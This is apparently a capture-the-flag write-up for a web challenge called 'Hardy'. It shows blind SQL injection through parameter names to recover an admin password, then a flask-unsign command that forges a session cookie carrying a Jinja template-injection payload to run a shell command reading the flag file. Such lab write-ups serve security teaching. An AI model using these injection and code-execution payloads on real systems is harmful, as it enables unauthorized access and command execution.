# Web - Hardy

**No source code was provided**

## Solution

The parameter names are vulnerable to SQL Injection

### **Dumping the admin password**

```
username=admin&SUBSTRING(password,1,1)=I
```

```
username=admin&SUBSTRING(password,1,2)=IL
```

```
username=admin&SUBSTRING(password,1,3)=ILI
```

**ILIKEpotatoesSOMUCH::&&** is the password for the admin

the password also is being used as a **JWT** secret and the application is vulnerable to SSTI `{'type':'{{<payload>}}'}`

### **The Flag**

```
flask-unsign --sign \ 
--cookie "{'type': '{{cycler.__init__.__globals__.os.popen(\"cat /flag_086bf2851588e4e353fecee934635e09.txt\").read()}}'}" \
--secret "ILIKEpotatoesSOMUCH::&&"
```